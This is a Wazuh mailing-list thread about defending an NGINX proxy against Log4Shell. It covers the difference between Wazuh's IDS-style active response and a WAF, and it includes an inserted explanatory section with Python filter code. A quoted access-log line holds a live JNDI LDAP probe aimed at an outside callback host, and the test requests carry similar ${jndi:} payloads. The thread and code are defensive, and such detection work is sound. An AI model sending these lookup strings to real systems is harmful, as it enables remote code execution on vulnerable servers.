how to protect NGINX-based proxy from Log4j attacks: Wazuh or WAF?


mauro....@cmcc.it

Dec 27, 2021, 6:01:31 PM
to Wazuh mailing list

Dear Users,

I'm trying to protect our NGINX-based proxy from Log4j attacks.
The Log4j package is not installed on the proxy server, and all the services behind the proxy have the updated version of Log4j.

Unfortunately, after applying the solution provided here https://wazuh.com/blog/detecting-log4shell-with-wazuh/, Wazuh started detecting a lot of Log4j attacks and stopped them with active responses.

Now my questions are:

1) Do I need to do something else to make the proxy safe? Is Wazuh enough to be sure, or should I add a WAF?

2) I noticed that, sometimes, the NGINX server response is "HTTP/1.1 200".
What does it mean? Why does it happen? The proxy doesn't have Log4j...

Received From: "proxy Ip"->/var/log/nginx/access.log
Rule: 100205 fired (level 12) -> "Log4j RCE attack attempt detected."
Src IP: 107.77.106.62
Portion of the log(s):

107.77.106.62 - - [27/Dec/2021:23:31:53 +0100] "GET /?uoasq=${jndi:ldap://proxy_ipc753v6c2vtc0000ew2vggd1t7uryyyyyb.interact.sh/a} HTTP/1.1" 200 3700 "-" "curl/7.64.0" "-"

Could you please help me to understand how I should proceed?
Thank you in advance,
Mauro

Juan Pablo Cordone Rosello

Jan 17, 2022, 3:37:46 PM
to Wazuh mailing list
Hi Mauro,
Sorry for the belated response. The blog post you followed has two separate sections:
  1. Detecting whether your environment has any endpoint with a vulnerable Log4J library: this helps you configure the security configuration assessment (SCA) capability to find out whether your environment is vulnerable or not. It does not do any remediation, but if you check the SCA policy, it does provide a hint towards what the remediation is:
    [image: Wazuh - Log4J.png]
    You can find more information on this capability here. You could also use this same alert to trigger an active response, which will in turn perform an action on your endpoint to remediate it. You will find more information on how our active response works here.
  2. Detecting exploit attempts: these rules are just to detect whether there were any exploit attempts, regardless of whether they were successful or not. There is no active response configured in the post.

Please let us know whether this answers your questions or you need any further clarification.
Regards,
JP.-

Mauro Tridici

Jan 18, 2022, 3:01:47 AM
to Juan Pablo Cordone Rosello, Wazuh mailing list
Hello Juan Pablo,

thank you very much for your reply. I really appreciated it.
Your explanation is very useful, for sure.

Anyway, I still have one last question:

I just activated an active response to block Log4j attacks using Wazuh and it works as expected.
I would like to know whether it is enough to fight against Log4j attacks, or whether I also need to activate a WAF module.

This is my last question :)

Many thanks in advance,
Mauro


-------------------------
Mauro Tridici

Fondazione CMCC
CMCC Supercomputing Center
presso Complesso Ecotekne - Università del Salento -
Strada Prov.le Lecce - Monteroni sn
73100 Lecce  IT
http://www.cmcc.it

mobile: (+39) 327 5630841
email: mauro....@cmcc.it
https://it.linkedin.com/in/mauro-tridici-5977238b

-------------------------

Juan Pablo Cordone Rosello

Jan 31, 2022, 6:41:26 PM
to Wazuh mailing list
Mauro, sorry for the late response!

Even though you're using Wazuh's active response capabilities to block the IP addresses of incoming Log4Shell exploit attempts, Wazuh does not work as a network IPS but rather as an IDS: it acts upon the detected event rather than preventing it from happening.
A WAF, on the other hand, can prevent the attacks by inspecting the incoming traffic and blocking it. A well-configured WAF can restrict access to the applications to a set of parameters you configure.
They serve different purposes. Wazuh can even ingest the logs from the WAF to get further information about the activity.
Please let me know if this answers your questions. Regards,
 JP.-
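The IDS-versus-WAF distinction above has two concrete consequences for this proxy. A log-driven active response runs after NGINX has already proxied the request and written the access.log line, so the first probe from each source is always served (that is the 200 in Mauro's alert), and it can only react to what the log format records; the combined format carries the request line, Referer and User-Agent, so a payload in any other header or in a POST body never reaches the rule. An inline filter sees the whole request before it is forwarded and can refuse it so the upstream never handles it. The code below is an added, illustrative example, not a WAF product and not anything from the thread: a small WSGI wrapper standing in for an inline inspection layer, with a stand-in upstream that counts what reaches it. The `Upstream`, `make_filter` and `send` names are hypothetical, the signature is deliberately the plain `${jndi:` after percent-decoding (obfuscated variants are out of scope here), and all requests are constructed in-process.

```python
import io
import re
import urllib.parse
from wsgiref.util import setup_testing_defaults

# Deliberately minimal signature: literal "${jndi:" after percent-decoding.
# Obfuscated variants such as ${lower:j}ndi are out of scope for this example.
JNDI_RE = re.compile(r'\$\{\s*jndi\s*:', re.I)


def _decode(value: str) -> str:
    """Percent-decode up to three times; probes are often double-encoded."""
    for _ in range(3):
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_jndi(environ, body: bytes):
    """Return (location, value) of the first JNDI lookup in the request, else None.

    Checks the path, the query string, every header (HTTP_* keys in WSGI) and
    the body: most of these never appear in a "combined" access log line.
    """
    candidates = [('PATH_INFO', environ.get('PATH_INFO', '')),
                  ('QUERY_STRING', environ.get('QUERY_STRING', ''))]
    candidates += [(k, v) for k, v in environ.items() if k.startswith('HTTP_')]
    candidates.append(('body', body.decode('utf-8', 'replace')))
    for location, value in candidates:
        if JNDI_RE.search(_decode(value)):
            return location, value
    return None


def make_filter(app):
    """Wrap a WSGI app so requests carrying a JNDI lookup get 403 and never reach it."""
    def filtered(environ, start_response):
        try:
            length = int(environ.get('CONTENT_LENGTH') or 0)
        except ValueError:
            length = 0
        body = environ['wsgi.input'].read(length) if length > 0 else b''
        if find_jndi(environ, body):
            start_response('403 Forbidden', [('Content-Type', 'text/plain')])
            return [b'blocked\n']
        environ['wsgi.input'] = io.BytesIO(body)   # hand the consumed body back
        return app(environ, start_response)
    return filtered


class Upstream:
    """Hypothetical stand-in for the service behind the proxy; counts what reaches it."""
    def __init__(self):
        self.served = 0

    def __call__(self, environ, start_response):
        self.served += 1
        start_response('200 OK', [('Content-Type', 'text/plain')])
        return [b'home page\n']


def send(app, method='GET', path='/', query='', headers=None, body=b''):
    """Drive a WSGI app in-process (no socket) and return its status line."""
    environ = {}
    setup_testing_defaults(environ)
    environ.update({'REQUEST_METHOD': method, 'PATH_INFO': path,
                    'QUERY_STRING': query, 'CONTENT_LENGTH': str(len(body)),
                    'wsgi.input': io.BytesIO(body)})
    for name, value in (headers or {}).items():
        environ['HTTP_' + name.upper().replace('-', '_')] = value
    status = []

    def start_response(s, h, exc_info=None):
        status.append(s)
    list(app(environ, start_response))
    return status[0]


def demo():
    """Four constructed requests: one clean, three with the lookup in different places."""
    upstream = Upstream()
    app = make_filter(upstream)
    results = {
        'clean': send(app, path='/login'),
        'query': send(app, query='uoasq=%24%7Bjndi%3Aldap%3A%2F%2Fcallback.example%2Fa%7D'),
        'header': send(app, headers={'X-Api-Version': '${jndi:ldap://callback.example/a}'}),
        'body': send(app, method='POST', body=b'{"user":"${jndi:dns://callback.example/x}"}'),
    }
    return results, upstream.served


if __name__ == '__main__':
    results, served = demo()
    print(results, 'requests that reached the upstream:', served)
```

Only the clean request reaches the upstream; the other three are refused before forwarding, and two of them (the `X-Api-Version` header and the POST body) would be invisible to a rule reading a combined-format access log. That is the gap JP's answer points at: Wazuh can tell you an attempt happened and block the source afterwards, while inline inspection is what stops the request itself.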

Mauro Tridici

Feb 2, 2022, 5:46:53 AM
to Juan Pablo Cordone Rosello, Wazuh mailing list
Hello Juan Pablo,

thank you very much for the explanation.
Now, everything is more clear to me.

Have a great day.
Kind Regards,
Mauro